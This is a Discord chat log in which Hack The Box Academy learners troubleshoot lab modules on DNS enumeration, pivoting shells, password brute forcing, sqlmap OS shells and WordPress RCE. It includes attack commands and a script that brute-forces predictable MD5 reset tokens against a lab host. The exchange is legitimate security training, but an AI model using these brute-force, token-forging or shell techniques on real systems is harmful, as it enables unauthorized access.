#modules

Even not pinging it I find it odd that it keeps outputting the IP backwards with NSLOOKUP... am I doing something wrong?

that's just what a reverse lookup does.

Ah, lol

it'll reverse the IP like that

You could just tee it to a file. Like:

crackmapexec ..... | tee -a output.txt

i can't remember on the top of my head but there is tools for enum big amount of user and output it's (even for report) but right now i don't even remember where you can get info on tool like that but the AD module should help (i think)

no problem

I guess next step in troubleshooting is why the heck can't I find it lol

oh wait why tf are the previous one RHOST? which section is that?

• if you mean RPORT in your previous message then i think you are right

Why though? The handler is running on my machine and needs to connect to the pivot host (that has the socat listener running, which is the first command in the screenshot) on port 8080, which will then forward to the internal Windows host.

Socat Redirection with a Bind Shell (yes, I wanted to say RPORT)

okay thought I was going crazy hahah

Using the devtools right because ive logged in using all the other methods? ive tried it using the devtools over 20times and i just dont get why it doesn't work. am out now but will try again when i get home. thank you for replying bro

np and what i did for this is login > copy cookie > logout > use old cookie value to login

same thing i did but i'll try again later

@ivory dock no

So um... is the Zonetransfers module... just broken for me?

I feel like I am missing a huge step lol

i'm double checking the pivot module right now i'll give that a check in bit but the last time i checked everything was working fine

Doesn't help that I haven't worked on this in like... 2 years lol

i mean that section is for a bind shell and so of course you have to use rhost to connect into that shell but if then why are the example using rhost and lport

no what

after only few week without hacking web when i got back to that i was like a caveman

@ivory dock because u are listening for incoming connection

I'm not, the pivot host is listening on port 8080

look at the first command in the screenshot

starting to wonder if my dns is working on my machine

Nope. I can resolve to stuff

just nothing that the module tells me to lol

It's a bind shell, not a reverse shell

you can only resolve to the spawned vm

@ivory dock ok

but its asking for a FQDN of a different IP address

ok, try searching the DNS records

@ivory dock yeah i got 0 idea how bind shell work i never use it but i just give it a try and didn't set and rport on lport and rhost and it's still work

hmm weird

a reverse shell has the target connect to the attack host

a bind shell has the attack host connect to the target host

so your LPORT would be the port the bind shell connects back to on your host

@unreal crescent yep just give it a quick try and everything seem to be working fine for me what issue are you having?

ahh I know my issue, LPORT refers to a listening port on a host, and since we're using a bind shell, the only port we could be referring to is the one on the remote host, because of the nature of bind shells

this is why i only use rev shell

I'm probably just an idiot lol. I can't seem to dig or nslookup any of the items that it asks for in the questions

which one

Bind shells don't connect back to us (the attacker).

yeah i just realized that..

in particular 10.10.34.136 and 10.10.1.5

Figured it out though

i even said that the bind shell has the attack host connect to the target host

lol

but all of them really. Those are just two of the questions I have left to answer lol

so like i said all subdomain are dead including those 2 so what you have to do here is find a way to dump as much subdomain as you can (i use dig) and each one will give you an ip and after that just fine the subdomain that match the ip

oh so I would dig the target?

also the last one i end up manually counting it

yep

See I knew it was gonna be stupid lol

Wow I am rusty... I can't get anything out of Dig either

hint ||zone transfer||

slightly off topic: is there any decent way to change the theme\colors on the academy website? For some reason the current colors just totally induce eye strain\fatigue for me.

nope

I didn't think so :/

search for a browser addon/plugin that can adjust colors

@hybrid nymph dm

At this point I am just getting frustrated at my own incompetence

yoo sup

i need to learn how to hack

no one here is to going to provide you hacking services.

I can't even get a previous answer at this point... not even the dang nameserver

/starthere

@autumn pilot while you are here

what

wdym

the command is supposed to work

but i guess not

oh ok

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

there we go

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

oh alrt

alr tysm

no one here will provide you hacking services.

#modules message

yeah everyone can hack but no one is going to help you with that

Ethical Hacking...

this is a cyber security learning platforms not a hacker for hire forum

We practice Ethical hacking here...

Oh k

Please read the rules.

and can we please keep this channel on topic related to Modules. Otherwise, I'll have to hand out mutes.

Sorry

how do i open the OVPN?

#1024429874246590575

oh ok my bad

I can't figure out what I am doing wrong... I can't even use nslookup to get the name server anymore in the ZoneTransfer Module... it says it can't find inlanefreight.htb even if I use the target ip

you might need to reset the VM

м

@novel matrix ..

ik

👢

🤣 funny how they tried multiple times. Anyway

... hmm... nope wasn't the VM. It's likely I just have forgotten everything, but I'd expect nslookup -type=NS $ip $ip being the IP of my target spawned would get me something instead of an NXDOMAIN error... It's got to be me though.. I am definitely forgetting some important first steps

i find dig to be my preferred DNS enumeration tool

None of it. I can't use any of it.

let me pull up the module

dig doesn't give me an answer only the Authority

mrTOM said everything is working. I feel like it's just a failure on my part

which section is it?

Active Subdomain Enumeration

of the Information Gathering -Web Edition

and you're trying to find the FQDN for 10.10.34.136?

Among other things, but I went back to basics and tried to re-answer the first question

and I am failing to even do that lol

ok, i pulled up the FQDNs

The lol was definitely forced... I am feeling pretty incompetent right now lol

i'd say try using dig

dig just returns authority and no answers for me

what's your command?

I've tried dig -x, dig, dig any with a the target ip, inlanefreight.htb, and the ips that are for those questions

separately of course

yeah but what's the command you're doing

latest was dig any $ip

got no servers could be reached

its definitely user error though

$ip is a user-defined variable, did you set the variable to the IP?

yeah

I used export ip= and the ip of the spawned machine

and did you specify the nameserver?

I tried, but it told me that it couldn't find the address of the nameserver

what did you put for the nameserver?

dig any $ip @ns.inlanefreight.htb

your host has no way of resolving ns.inlanefreight.htb

put the IP of the VM there instead

like localhost? or $ip

the IP of the target i mean

still no answers on dig

the other problem is that you're trying to query DNS records for $ip, but the nameserver you're querying won't have that IP in its records

try querying for the domain instead

do I need to add inlanefreight.htb to my hosts file?

you don't need to

the DNS server is supposed to resolve queries for a domain

all you need is the IP address of the nameserver you're trying to query and the domain you want to query

if you query a domain name for the nameserver and you get a response back, then you're good to go

oh like put inlanefreight where I had $ip and have $ip as the nameserver

yeah

oh that gets me answers now lol... Man... I am rusty as hell lol

at the very least that allows me to re-solve the first question lol

A little piece of advice: If you’re stuck on a really frustrating lab, just disengage for the rest of the day and come back to it the next day. I usually solve it within a few hours when that happens.

Right now It's more of an issue of forgetting everything that I learned a couple years ago lol

lol that was general advice. You’ll probably have that issue soon too though.

Fair. Yeah I notice that previously it works to take a step back

Helped me on Command Injections. That Skills Assessment was no joke.

Yeah that one was fun

hmmm... still not sure how to use what he helped me with to solve the rest of it lol

clear

oops lol

At the very least I am getting an answer for the nameserver again lol

on the Windows Privilege Escalation module. The Pillaging section. Question is "Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag. ". This is where I should be able to extract a cookie from the cookies.sqlite for slack.
I can extract the cookie just fine, but when I go to the slack.com page, it says I should replace cookied "d" with what I extracted. There appears to not be a cookie d on slack.com, however.

try replacing the cookie in the request part for the page.

Kind of like Session Hijacking. I can't remember if I did the Windows Privilege Escalation module yet though so its just an idea

It looks like there are three cookies, "b", "OptanonConsent", and "x". I tried replacing all three of them. I will keep playing with it, thank you!

Also I am back to failing lol. Can't seem to use what I learned earlier to figure out the FQDN of an IP address

Hello Everybody, doing the Linux fundamentals class having an issue with ssh ─[us-academy-2]─[10.10.14.114]─[htb-ac704460@htb-pkzc6ayftb]─[~]
└──╼ [★]$ ssh htb-student 10.129.31.217
ssh: Could not resolve hostname htb-student: Name or service not known
┌─[us-academy-2]─[10.10.14.114]─[htb-ac704460@htb-pkzc6ayftb]─[~]
└──╼ [★]$

is htb-student the hostname or login?

Vm to the target

Let me go back to it so I know what you are talking about ok?

did you do ssh htb-student@10.129.31.217 ?

ah he missed the @ yeah sounds like I need to go back to linux fundamentals too

Yes

was getting it yesterday also waited few hours before trying again still same issue also try other browser.

And your connected to the VPN when doing this?

hello all, wondering if I can get some help... with WINDOWS COMMAND LINE module , I am having an issue with the VM ... I'm on the second question and found the flag for😩 the previous question but the flag does not work as the next password for the user - has anyone worked on this module before ?

any help would be awesome

also, try on another browser same issue.

Bsmith are you talking about the question where it asks you to ssh using the username and password?

Hello there ... I am dealing with the same issue! When you say you re-deployed the environment .. did you just restart the vm session with a new target? I have tried that with no success

dose anyone have a help to give on the footprinting/ dns/ last question

yeah that's all i did

hey @median halo send me a friend request i'll help

Thank for the quick reply ...just to make sure that I'm not doing the wrong thing ... you ssh'd with user1@the ip and then put in the password ... correct?

yea

ok... I will give it another go .... what a pain! Happy Hacking !!!!

Thank you for the help.

Hello everyone, I'm currently working through the Active Directory module on Hack the Box and I'm having trouble understanding the difference between AD rights and privileges. I've read some explanations, but I'm still a bit confused. Could someone with experience in AD please explain the difference between the two, and perhaps provide some examples of each? Thanks in advance!

good question @ember jewel

In the Introduction to Windows Module I am having a hell of a time figuring out how to install xfreerdp

Privilege is the level of access you have and the rights to make changes, rights means that is just your ability to interact with things

But overall they're used interchangeably

Generally if you have the rights to something in Windows you have privileges on it

https://superuser.com/questions/1264558/what-is-the-difference-between-right-and-permission

see, what i got from chatgpt "Rights are individual permissions that grant specific access to system resources, while privileges are group permissions that allow members of a group to perform specific administrative tasks." but then again the AD module from hack the box says otherwise "Privileges can be assigned individually to users or conferred upon them via built-in or custom group membership" which is which?

HackTheBox in this regard is more accurate and detailed in their description. ChatGPT used more words

but isn't necessarily correct

so in that case there is no clear cut difference between rights and privileges?

In the case of Rights and Privileges in regards to a File, Folder, Program, etc. They are interchangeable.

well you can have a group with one user @ember jewel

OMG no matter how much space I give my VM I can't update my PWNBox lol

I'm clearly unable to install xfreerdp lol. How do I use Remmina to connect to the rdp thing in Intro Windows

I feel like I am putting the right info in the right spots, but it keeps saying lost connection

... I'm a moron lol... my VPN stopped

Use dnsenum and multiple wordlists

All in the SecLists folder

module:Using CrackMapExec
Skill Assessment
Gain access to the SQL01 and submit the contents of the flag located in C:\Users\Public\flag.txt.
I need some help i cant find any more accounts to get access to sql01 can u give me some hints

Thank you guys

Hey, I have an issue with Attacking SQL Databases section from Attacking Common Services module. I've managed to get the password for mssqlsvc, but I'm stuck on enumerating the flagDB database. Htbdbuser does not have the privileges and I cannot login with mssqlsvc credentials... any hints?

hint use domain syntax

Hey! Any idea why SSH won't work? I tried removing the firewall and I'm sure the user and the IP are right. On my VM, it says timeout something.

Is the ssh service enabled?

I enable it with sudo service ssh start, right, if so, yeah

ssh: connect to host <ip> port 22: Connection timed out

Try ssh -22 user@ip

Check OpenSSL too and make sure it's running

And ufw

Should firewall be running?

IG my terminal is just bugging because kex-win isnt running as well but it was before

I dont know

if you're trying to SSH into a box, you don't need to be running the SSH service on your machine

What are your guys' note taking methodology/process for the modules

How do I encode a reverse shell already written to file? In other words, I want to use msfvenom to encode a custom payload I made myself.

I write on a notebook since I remember better when I take notes on paper. Let's say I'm doing Module: Linux Fundamentals. I write it as a big caption and every section and undersection like that:

https://snipboard.io/J7swly.jpg

1. The Shell
   1.1. Prompt Description
   1.2. Getting Help
   ... and so on
   and I do a), b), c)... where needed
   I also write all the essential commands

I'm struggling to take effective notes without doubling the amount of time each module takes

So I've been copying and pasting a lot

But I realize I'll remember things better if I write my own

I'm on a deadline

@rancid wraith

Oh, well

I have much free time so it is not a problem when I double my time

But yeah, I am working really slowly as well

I've found that, when I first started the modules I was struggling to identify what exactly to take notes on... So instead what I've resorted to, is more objective style notes. I'll make a .md or something with the module or objective title, have an overview \ summary or whatever and place general notes into it. And then, take notes based on the module or lab objective.

So what if you take longer?

Look into Obsidian

Will do! thanks for the reference.

Obsidian uses .md format and allows you to make back links to other documents

which wordlist for passwords to use on attacking gitlab. I have the username

Anybody have a link for the Academy mentoring stuff. Curious about it.

Was there not a provided word list in resources?

nope

Academy mentoring is a meh idea tbh, like I get the premise, but it depends on how you plan to use it. As, for the most part, the modules are (usually) fairly good at teaching what you need to know

did u figure this out?

@novel matrix 👢 ?

yep

what do you recommend to use?

hint nothing 🤣

what do you mean lol

wait let me double check this i think i did report this issue but there is an issue with the wording for this part

the cred is ||sussybaka||

Idk, russia seems kinda noobish rn tbh

how tf did u figure this out

lol

@wind gust yep they haven't fix this but the section said you need a valid username and password but you only need a valid username

how will i get RCE then?

also this username is valid so you may want to remove it

just run the exploit with any random password

lmao

ok

but i think there is an issue with the exploit if you copy or download it from exploit-db or something like that

oh great

lol

i did noted down the password issue but nothing about the exploit issue so i may miss remember this

but give that a try if that doesn't work shoot me a dm

https://tenor.com/view/old-man-how-many-times-teach-you-this-lesson-spongebob-squarepants-gif-14501726

@vital adder i'm still having issues with the Attacking Common Services: SMTP may I DM you; maybe you'll have some insight into what I'm doing wrong; I'm using hydra but having noluck i've tried user and user@domain

i was going to make a meme about summon pwning boot but after a kick in the nut by offshore i forgot to do that

sure

nvm

found it

turns out I just didn't try the other thing I realized my initial mistake was not using the right port

It helps when I use the right port...huh

at least I know I actually learned it after the much time of struggling 🙃

oh yeah i think i make the same mistake the first time i do this

Can anybody tell me if in the "password attacks" module, "password mutations" step. If it took a long time for you to crack the password as well?

yes

Easy lab is mean still :(

Thanks

ah; wrong wordlist 🙃

guyss help me start hackingT_T

Linux fundamentals will please explain the long version of usermod -L and Su, Just not following what is being asked

thankss, hope this works out:)

https://academy.hackthebox.com

amazing:')

When spawning targets in the academy, what vpn do you connect to? The HTB app has the starting point vpn and the lab vpn, but when I try to ping the address on an academy machine IP with either of those vpns using my VM I get no response

there's an academy vpn

https://academy.hackthebox.com/vpn

Oh perfect, thanks!

in the getting started module it actually talks about it xD

Shouldn't have skipped the getting started module haha

also literally on every page where you have to use the vpn; there's

Weird, I didn't see that in the attacking web apps with fuff module

just PWN box

what's the IP that you have for ffuf

for the target

if it's in the format of IP:port then you may not be able to ping it; that's an indication of a docker container where the sole enumeration methods are using web enum; whatweb, dig, nslookup, etc.

Oh I see, yeah it is IP:port

to visit the page in a browser you do need to do http://IP:PORT/

For sure, thanks for the info!

once you visit it you can add the webpage name (unless you're told that the website is something like, inlanefreight.htb) and add the IP:PORT to your /etc/hosts in the form of
IP:PORT <inlanefreight.htb>

so in short: whenever it's IP:PORT the vpn is not needed

i highly recommend doing the getting started module

HOw do i make this in nano?

Stuck on a question please help, question is: What is the path to the htb-student’s mail? Ive tried /var/mail/htb-student, ive tried MAIL= /var/mail/htb-student, ive tried env thinking it wanted the command used to find where to find the mail, im out of ideas.

Did you put it in as the answer? No extra spaces?

Yes

Also just tried /var/spool/mail

Am I doing this wrong or is the lab broken?

The following question “which shell is specified for the htb-student user?” /bin/bash worked perfectly fine

@fathom pendant it finally accepted /var/mail/htb-student….I could’ve sworn I typed that 3 times tho

Yeah it's silly

Strange..

Question witch is better the parrot sec or pwn box vm

module - windows fundamental
section - windows security
question - Find the SID of the bob. smith user?
my doubt - There is only one user in the system which is htb-student and I copy and paste the SID of this user, what am I doing wrong here?
never mind I solved using "wmic useraccount get name,sid"

if you want more control over your vm; then downloading and installing the iso on a vm is better; however if you don't have the resources then pwnbox is fine... the modules have been confirmed to work fully with pwnbox :)

thanks just asking because in the initial modules it says to installed the Sec version one and since they have the pwn box i was wondering but thanks

it's a matter of preference

ok

I like being able to seemlessly transfer files to/from my vm as needed

i will stay with the pwn and be tunning my on own box

thanks

Try to gain RCE using one of the PHP wrappers and read the flag at /
m stuck at this question can someone help me please

Please anybody know why i can't get a reverse shell on netcat while trying to solve SOCCER, i tried getting it manually like putting my ip addr and port on my browser, it works, it captures it but after uploading the php reverse shell on the tinyfilemanager upload section, it doesnt capture it on the netcat listener, Someone please help me

#boxes is the channel to discuss htb machines. You'll want to remove the spoilers when you ask there.

#boxes

anyone help me on this one? I'm on the last question of the hard box; unable to go much further however because I'm just stuck at the process after enabling the SQL thing

Thanks

nvm figured it out

double quotes

Skills Assessment - WordPress: RCE Part in Theme Editor. Tried change to different Themes. Can't "Update File" the template. It hangs and doesn't save the updated code. any ideas what could be wrong. tried restarting vpn, machine, cleard browser cache, used other browser, waited one day and tried again. Still the same

also changed to admin user, always the same. Click "Update File" and then the website hangs and the wheel keeps spinning

tried also uploading custom plugin for RCE. Can't upload.

You don't have to upload a file.
For example, manipulate the 404 page.

yeah that's what i wrote. it does not work changing the 404 page, because of that i tried some other stuff. I know that it should work, but always: Something went wrong. Your change may not have been saved. Please try again. There is also a chance that you may need to manually fix and upload the file over FTP.

What did you want to change in the 404 file?
Write me a DM.

By the way, the error message regarding file upload via FTP comes from WP itself.

are you trying to edit the active template?

hey man, yeah it does not work

think about another way to upload

||(maybe a plugin?)||

Hello

Iit does work. Mind the PHP tags 😉

i tried adding a character to the commented section and returned error aswell

Hmm? Actually you should be able to modify an existing file without any problems.

i googled it and seemed to be an active plugin checking if the edition would break or not the web

https://tenor.com/view/ragey-mad-cat-angry-cat-raging-cat-rage-gif-26790394

||i installed advnaced file manager plugin and got it done||

anyone can help?

i use Get-Service | ? {$_.Status -eq "Running"}

and i don't know how to grep a non-standard update services

based on the output (results) of that command make an assumption which one is a non-standard

Oh my word. Finally finished the pen testing path

Cool, what's next? CPTS Exam or do you do a ProLab first?

Check the file extension. If you need help, send me a DM

Finish off bug bounty path (4 modules left). Then onto the hard modules. Then start working on boxes going from easy up to hard….
Then I might worry about exams :3

Hello I hope you are fine, so I need help on Attacking Common Services - Easy section.
(You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.)

I found a valid user using smtp-enum-user but then I can't manage to find its password using hydra (rockyou or resources pw list mutated or not mutated I also tried on ftp service so i'm blocked)
thank you very much

well done wolf

i just did the web service and api skills assessment and steam is coming out of my ears lol

Hello I have alpine test machine which has ssh port open and version is Openssh 8.0 I tried few exploits but didn't work can any one help me to find out proper exploit.

getting started, knowledge check, metasploit doesnt let me run the exploit bcs my ip is unavailable? pwnbox is off and i tried killing all processes without any results, chaging ports doesnt help either.
any help?

send exploit options

anyone has hints for AD Enumeration & Attacks - Skills Assessment Part II Q4?

i used
||enum4linux -u AB920 -p weasal -U 172.16.7.3 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"|| to get the list of users and put in a txt file
next i used ||sudo crackmapexec smb 172.16.7.3 -u user.txt -p /usr/share/wordlists/rockyou.txt | grep +||
but it crashes

i think is due to too many users

@.@

Broken Auth - Bruteforcing usernames question 2. I found the answer by manually inspecting all the requests in ZAP after I fuzzed the page. I'm wondering if I was supposed to be able to identify the user by using wfuzz and filtering for --hs ||"wronguser"||? When I do that, the correct user is filtered out even though the field on the reply for the correct user is ||<input type="hidden" name="validuser" value="TheAnswer">|| and doesn't have the string ||wronguser|| in it anywhere. What am I missing here?

What module is this related to?

Hello, I have a question regarding one of the Academy' modules.
I'm currently doing the Case7 of the sqlmap essentials modules and i'm stuck, the hint state that ||we should give the name of each column to sqlmap|| so my current command is|| sqlmap -r req.txt --level 5 --risk 3 --batch --dump -C 'id,name,birthday,occupation,phone' -T flag7 -p 'id'||, unfortunately it does not seem to be enough. Can someone tell me what i'm doing wrong ?

Username=admin
Password=nibbles
RHOSTS=the target ip
LHOST=my tun0 ip
LPORT=9001
Targeturi=nibbleblog
Payload=generic/shell_reverse_tcp

seems good, are u still connected with VPN?

has the target ran out of time?

idk

My bad I didn't read it correctly, I needed to set the|| number of columns|| and not their ||name||

Footprinting Lab-Hard. I cant connect to mysql from tom's machine after ssh. Any hint please?

I've been trying it since yesterday, I charged targets at least 5 times, I tried both with a kali vm and with pwnbox

shouldnt uri be http://.......

The module doesn't say so

hm

which mod are u on=

?

I confused you, I'm stuck both on knowledge check and nibbles, metasploit gives me the same error for both.
The metaploit method module is right bellow privilege escalation

Footprinting Lab-Hard. I cant connect to mysql from tom's machine after ssh. Any hint please?

On knowledge check I found the website credentials, tried an exploit on ||apache 2.4.41||, filled all the requirements and I got the same error

Help, i cannot find a description on this one

To which of the above categories does public vulnerability 'CVE-2014-6271' belongs to?

Try to find what the vulnerability is about and compare it to the options given to you on the module

anyone has finished with Footprinting Module?

I hear Tom has quite the history

already found that

Then you have everything you need

:)

still i cant log in mysql...

Are you connecting to sql from your machine?

from tom's

Are you doing it exactly as Tom is?

Remember you do have the password

i have found "key:2,S" but i dont know if i should use it and how

I read on Metasploit about description Advantech Switch Bash Environment Variable Code Injection i also tried variants and nothing is true

How did you log in to Tom's account

with id_rsa

i can't use the "key:2,S" witch is exactly the same key for ssh to tom's machine to log in mysql

one moment let me double check my methodology for this one

you can get Tom's password by looking at the other type of server this is

got it in roughly 5 minutes

still i dont get it. i'm stuck in this like 2 weeks now

The lab states that this server is also a backup server, have you done the snmp enumeration?

yes you mean the passwd starts like NMds..61

this is to log in imaps

from there you get the id_rsa to ssh it tom's machine

All I'm saying is that you do in fact have the password

There's nothing more to look for

Have you even tried using the password?

yes 😅

I don't recall needing to do anything extra

anyways..thanks for your time friend. I'll manage to find it

You did mysql -u tom -p
Then pasted password after yeah?

I'm not at my computer rn

@sharp thorn without ||-windows-auth||

yes

i found it thnx a lot 😄 i didnt used copy paste b4 i wrote a digit wrong in my notes

The username is not MSSQLSVC, take another look at the web.config output ,|| ID=<user>||

On the Fuzzing (ffuf) module: when doing VHost fuzzing I get errors even if I enter the exact same command as shown in the module (except for the port ofc: ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:31272/ -H 'Host: FUZZ.academy.htb' -fs 900). I changed the /etc/hosts to include "209.97.185.157 academy.htb" and I did not change resolv.conf (though I tried 'nameserver 209.97.185.157', but that didn't work either). Can someone give me a hint on how to proceed? Right now a scan runs 4997 targets but all turn into Errors..?

Hello, anyone can help me with CrackMapExec Skills Assessments ?

Try -u http:// ip:port

In /etc/hosts add the port to the IP for academy.htb
<IP>:<Port> academy.htb

i have ip

129.158.210.181

Both of these ansers seem to have worked, thank you! Why do I need to add the port to the hosts file? Can someone explain that to me?

Still working on "Password Mutations" of "Password Attacks" module. Its been over two hours following the documentation as is, using the lists + rules they provide. Wanting to ask if anybody else had the same experience, for a sanity check. Doesn't seem viable that HTB would require that much time devotion to a non-point earning question?

I'm stuck on the same question. Started doing ffuf to cleanse tha palette. I still don't know how to do that one. I tried different services (SSH, SMB, RDP, FTP) and ran through the entire 90000+ list multiple times by editing the mutated lists before the target would time out (removing failed attempts), but no result yet

@fathom pendant thanks for helping so many out here and being active.

You're using the custom.rule provided in the Password-Attacks folder yes?

yep, from the documentation I did hashcat --force password.list -r custom.rule --stdout | sort -u > mut_passwords.list. Been going at it now for 2.5 hours =/

It shouldn't take 2 hours to create, and as well , are you providing the absolute path to the lists/rules just in case?

It should take at most 30 seconds

If the custom.rule and password.list aren't in the directory you're in then you need to provide a file path to them

Yeah, they are in the same directory that I am operating out of. So the command is, as above.

Well that is mildly infuriating and discouraging =/

@final salmon Do you also get a mutated list of over 90.000 passwords?

Try updating your packages if you're on a VM and not pwnbox

It sounds like it hasnt finished

94044 94043 1034072 mut_password.list

So it completed

yep I have the same one

Why did you think it didn't complete?

And trying them all is the 2.5h job

Trying again with absolute paths. We will see, thank you.

Duded

You have a mut_passwords.list

Why are you saying it's taking 2.5 hours?

Its been attempting to brute for 2.5 hours without been successful?

Ok that's what you meant

Which service are you brute forcing on @final salmon?

^

SSH, it says "use the wordlist to brute force the SSH password". So I been sticking directly with that.

I've learnt the hard way that SSH is too slow to Bruteforce (took me 3 days to realize)

You should try another service, though I cannot tell you which one cause I have no clue either haha

I tried them all

Give me a minute to finish eating and I'll look at my notes on that section

Sall good, it will eventually find it XD. Just mildly annoying. I figured something has to be wrong, because they say for users attempting to make new BOXes on the main platform. That you should never set it up so that it takes longer than 30 minutes, if bruting was the intended path.

Because bruting is intended but double check what services are running on the target :)

Also if it's been running 2.5 hours then your target may have timed out. So you'll need to reset it

Yeah, I reset it after re-making the list with full-paths.

Run an nmap scan to see which ports are open aside from ssh

What are the box defaults, 90 minutes?

I think so

@fathom pendant which services are the best ones to target brute force on?

Generally anything but ssh unless you have a small list

Module says that secure protocols can be a pain. RDP, SSH.

^

Good Afternoon,

Currently stuck on a question within the SQLMAP ESSENTIALS module OS Exploitation section.

The hint is "The flag is in a very common directory!"

I've gained an interactive OS Shell, however im unable to find a second flag after looking at nunerous common directories.

Can someone provide a hint or nudge in the right direction?

Hydra on RDP is pretty poop, I ended up using crowbar

Hydra is alright with rdp

I've been able to do bruteforcing with crackmapexec and hydra

Also in both you can increase the threads they use

Yeah, Hydra will downgrade to 4 though.

So for hydra you can specify -t 32

For ssh

That's why it's slpw

Slow*

Yeah

Again look at what services are available and re-aim your attack

@fathom pendant Yeah, I scanned, trying different protocol to see what happens.

I just did (FTP/SMB139/SMB445/SSH), FTP had no hits (account not allowed to FTP maybe? now trying SMB, but that's so slow haha

Any way to speed it up?

recommended number of threads: 48

^

More threads = faster scanning

But depending on sec measures too many threads can break things and you never get the pw

Linux or Windows?

what switch is setting the threads on crackmap? Im looking at the -h for SMB but it doesn't show any thread switch

check crackmapexec -h

^

Probably -t or -T?

oh its in the main -h page

Ye

from hashlib import md5
import requests
import time
import datetime

url = "http://134.122.103.40:32230/question1/"
time = int(time.time())
now = int(time) * 1000
start_time = now - 1500
fail_text = "Wrong token"
user = "htbadmin"
endtime = now + 1500

pre_data = {"submit": "htbuser"}
pre_res = requests.post(url, data = pre_data)
if "Your token is" in pre_res.text:
for x in range(start_time, endtime):
token = user + str(x)
md5_token = md5(token.encode()).hexdigest()
raw_data = {
"token": {md5_token},
"submit": "check"
}
print("checking {} {} {}".format(str(x), md5_token, token))

    res = requests.post(url, data=raw_data)

if not fail_text in res.text:
print(res.text)
print("[*] Congratulations!")
exit()

pre_data = {"submit": "htbuser"}
pre_res = requests.post(url, data=pre_data)
if "Your token is" in pre_res.text:
threads = []
for x in range(start_time - 2250, start_time + 2250):
t = threading.Thread(target=check_token, args=(x,))
threads.append(t)
t.start()
for t in threads:
t.join()
exit()

hey guys I've been struggling on the Broken Authentication - Predictable Reset Token - Question 1 module for several days, I wrote this scipt and it seems to me all correct could help me? please

Put the output in code blocks ffs ``` before and after the code blocks

what do you mean by output?

The thing you pasted above

I think it's a timing issue

for gmt +1

Yes probably a timing issue

or like that but don't find

I've heard thats a common thing with that module is timing

if i put a timezone(Europe/paris) is good ?

if you're in the US, it's also prevalent in the file upload attacks module..

Idk man I haven't done this module

i'm in paris and i have finish this module "file upload attacks "

I'm just letting you know your issue is a common one, discord has a search feature where you might be able to search for the module name and section to see if someone else had the same issue

dont know anything about paris tho

Linux

find / -type f -name "user.txt" 2>/dev/null you can replace user.txt with whatever the file name is your looking for.

You still cracking away too?

yeapp

Cheers!

Happy cracking!

Which protocol you going against?

smb port 139

you?

Trying with SMB myself. Set the threads to 38. Been going for about 30 minutes.

Yeah same here, at the letter A now (just did the numbers)

Why not 48?

I set it to 48

Still slow as a sloth 😛

I dunno lol I thought I saw it as 38. Don't want to turn back now XD

The shell I used was via the command: sqlmap -r getrequest.txt --os-shell --technique=E --batch

@elfin nacelle May want to look into using sqlmap to upload a shell, then trigger that shell using the command option. Will get you out of the restricted shell style environment, allowing more access.

i'd enumerate the webroot and then start looking around the root folder

Helllo, anyone working with the bash introduction module?!

@arctic sentinel Nope, but what is your question?

Module: Password Attacks; Section: Credential Hunting in Linux

Setup: the question is to find the password for Will. The hint implies that you need to be on the box as kira first, and look for Will's password from there. The hint says kira can ssh to most boxes with the password LoveYou1

Issue: I can't get on the box as kira. I've tried the given password on the open services (ftp, ssh, smb). I've tried all the passwords in password.list. I've tried all best64 mutataions of loveyou and LoveYou. I've tried c, $1, and c $1 mutations of all passwords in the given password.list.

The forums don't seeem to have any hints to get on with kira...mabye it's supposed to be easy... I've been here for 2 hours

Anyone can help?

did you use the custom rule?

I`m in the first exercise and been trying many things... Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer.

wow this game sucks

but ty

I`m trying to search around the explanations of how to work this out but I'm stuck

Yeah sorry don't have that module to assist. That question explanation sounds awful though =/

Thing is that it`s the first exercise... I can't believe I have to give up the module cause of this...

I uploaded the shell via sqlmap. What is the command option to trigger that shell?

is there something you don't understand?

Well once you have a listener set-up. You can just use /bin/bash -c '/path/to/file/uploaded'

I`m reading how to use the wc -c command but I can't get it working...

What does "for counter in {1..40}" actually does?!

Runs the code in the for loop 40 times.

Ohhhh ok!

counter is a variable name

echo $counter`
done```
Will print 1 through 40

Ignore the (`) character after counter. It was typo

@final salmon hows your scan going?

Lol, its going. About to just say forget it

This is what I`ve got so far... but the answer I'm given is incorret...

I'm pretty sure it's not gonna make it in time (im at B with 30 mins on my target left)

@final salmon this is where I dont know what to do: the machine has 4 services open (ftp, ssh, samba(2x)). Samba is too slow to make it in time, so is SSH, which leaves ftp but that one returns no results..?

@arctic sentinel What was the original script?

No idea man, same boat. Will probably let it run till box times out. Then just move on.

I'm afraid I'll have to as well.. Shame cause I wanna complete all modules 100% xD

well the script's giving you half the answer

@arctic sentinel Try adding if statement below your var declaration. within the loop:

#!/bin/bash
var = "nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}
do
  var=$(echo $var | base64)
  if [[ "$counter" == 35 ]];do
    echo $var | wc -c
  fi
done

Your original script is not actually printing out your continuously updated variable. Read through it, line by line, as you have it. Think about what it is actually doing.

why did you just give him the answer

I've never done it before, so I don't know what the answer is. I said try this. But now that you stated it, we can assume it is the answer.

@final salmon seems like we can't do the next section either, since it requires the previous creds (sams):

So far I only get 27, 13, 37

Ugh. That sucks. Guess I will have to keep trying =/.

@chilly forge Mine actually just crashed XD.

Imagine not remembering the creds cause you stopped after that exercise and next time you gotta redo the 2.5h pwcracking

@final salmon damn

Lols, I been doing on my own Kali vm. Gonna restart it on pwnbox. Jump their VM costs for making me waste so much time, a little fight back at least XD.

hahahaha, I've exclusively been using their Pwnboxes

it`s not the answer...

If anyone has hints for the password cracking module: Password Mutations, PLEASE give me a hint!

treating it as pseudocode, it very well is

the section is trying to teach you how if else statements work

the question is asking for you to print the number of characters of the 35th generated value of the variable "var"

how would you go about doing that?

one part of the puzzle is given to you in the comments of the script

echo $variable | wc -c

this will output the number of characters in a (string) variable

you need to figure out how to create a conditional statement in the script that will print out the number of characters of the 35th "var" string

hey

and as the section content implies, you can do that with an if else statement

how do i start

im a complete braindead

I`m on it!

